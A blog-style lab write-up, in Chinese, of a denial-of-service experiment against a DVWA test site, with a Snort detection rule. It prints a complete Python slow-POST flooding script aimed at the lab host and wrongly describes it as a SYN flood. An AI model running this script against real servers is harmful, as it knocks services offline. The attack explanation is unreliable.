最近对DoS攻击进行了实战,这里做个记录
环境
实验用到了两台虚拟机,分别是攻击机和靶机,其配置如下:
- 攻击机
- Windows 10
- Python3.8.2
- 靶机
- Ubuntu 20.04
- web server(这里用的DVWA作为网站,xamp作为服务器)
- Snort 2.9.18.1
环境搭建
攻击机
直接在官网下载Python3,无脑双击安装即可
靶机
网站搭建
下载网站源码,这里直接拿的DVWA的源码做实验
下载官方推荐的xampp
执行命令:
sudo chmod 777 xampp-linux-x64-7.4.3-0-installer.run
sudo ./xampp-linux-x64-7.4.3-0-installer.run
在弹出来的界面处,点击Welcome界面,点击Open Application Folder:
找到hotdocs文件夹,将解压后的dvwa网站源码放进去,并运行以下命令:
sudo chmod 777 -R DVWA-master
点击Manage Servers,然后点击Start All按钮:
全绿即可。
如果绿不了,尝试以下命令即可解决:
sudo service mysql stop
sudo service mysqld stop
sudo service nginx stop
sudo service apache stop
sudo service apache2 stop
然后修改网站源码下的config文件夹内的config.inc.php.dist为config.inc.php,然后更改文件内容(主要是数据库账号密码)
然后就可以打开网站了:
Snort安装
这里参考博客进行安装,不再赘述
环境配置
靶机snort配置
首先使用命令编辑snort.conf:
sudo gedit /etc/snort/snort.conf
将其中的RULE_PATH更改为实际环境中存放规则的路径
使用命令编辑local.rules(具体路径根据实际情况来):
sudo gedit /etc/snort/rules/rules/local.rules
添加DoS攻击检测规则在文件末尾:
alert tcp any any -> $HOME_NET 80 (flags: S; msg: "Possible DoS Attack Type: SYN flood"; classtype:attempted-dos; flow:stateless; sid:3; detection_filter:track by_dst, count 20, seconds 10;)
其中:
-
alert表示显示为告警 -
tcp表示检测的协议 -
any any表示检测任意IP和端口发送的数据包 -
->表示to -
$HOME_NET表示目的ip -
80表示目的端口 -
flags用于检查是否存在特定的TCP标志位,这里的-S表示- SYN - Synchronize sequence numbers,其他参数具体可见官方文档 -
msg表示显示在告警中的描述 -
classtype表示告警分类,不可随意命名,其可选参数可见官方文档 -
flow关键字与会话跟踪一起使用,它允许规则只适用于交通流的某些方向。这里的stateless表示触发器与流处理器的状态无关,其他参数具体可见官方文档 -
sid表示规则的唯一标识符,由于100-1,000,000的号码均已被注册,因此需要自定义一个该范围之外的数字 -
detection_filter定义了一个速率,在规则生成事件之前,源主机或目标主机必须超过这个速率,这里设定为10秒内的数据包达到20个即判定为DoS攻击
规则设定完成之后,首先运行命令查看网卡:
ifconfig
注意图中红框圈出的地方即为网卡标识符
然后验证并配置规则:
sudo snort -T -c /etc/snort/snort.conf -i ens33
其中:
-
-c表示configuration,即使用/etc/snort/snort.conf作为配置文件 -
-i表示interface,即调用的网卡接口,这里使用上文中查看到的网卡标识符
出现以下界面则表示规则书写并配置正确:
攻击机DoS脚本
参考网上的DoS攻击源码,改一改使其适用于Python3,脚本源码为:
#!/usr/bin/env python
import socket
import time
import threading
#Pressure Test,ddos tool
#---------------------------
MAX_CONN=20000
PORT=80
HOST="192.168.80.133"
PAGE="/DVWA-master/login.php"
#---------------------------
buf=(("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 10000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE,HOST)).encode())
socks=[]
def conn_thread():
global socks
for i in range(0,MAX_CONN):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((HOST,PORT))
s.send(buf)
print("Send buf OK!,conn=%d\n"%i)
socks.append(s)
except Exception as ex:
print("Could not connect to server or send error:%s"%ex)
time.sleep(10)
#end def
def send_thread():
global socks
while True:
for s in socks:
try:
s.send(b"f")
#print("send OK!")
except Exception as ex:
print("Send Exception:%s\n"%ex)
socks.remove(s)
s.close()
time.sleep(1)
#end def
conn_th=threading.Thread(target=conn_thread,args=())
send_th=threading.Thread(target=send_thread,args=())
conn_th.start()
send_th.start()
然后保存为DOS.py备用
其攻击原理为不停地向目标机器发送TCP握手请求,发送SYN包建立连接,但不发送ACK包完成连接,从而导致目标机器一直处于等待连接建立的状态,消耗大量系统资源,从而没有剩余资源对正常的网络请求进行响应。
攻击&检测
在靶机使用命令启动snort:
sudo snort -A console -q -c /etc/snort/snort.conf -i ens33
其中:
-
-A console表示显示标准的告警输出 -
-q表示quiet,即以静默模式启动 -
-c表示配置文件 -
-i表示接口
然后在攻击机中,打开cmd窗口,使用命令运行脚本:
python3 DOS.py
此时,通过浏览器打开原网站,可以发现页面无法正常加载,攻击实施成功,甚至还把数据库账号密码爆了出来hhhh(图中打码处为数据库密码):
然后查看靶机,可看到检测到了DoS攻击,表明检测规则有效:
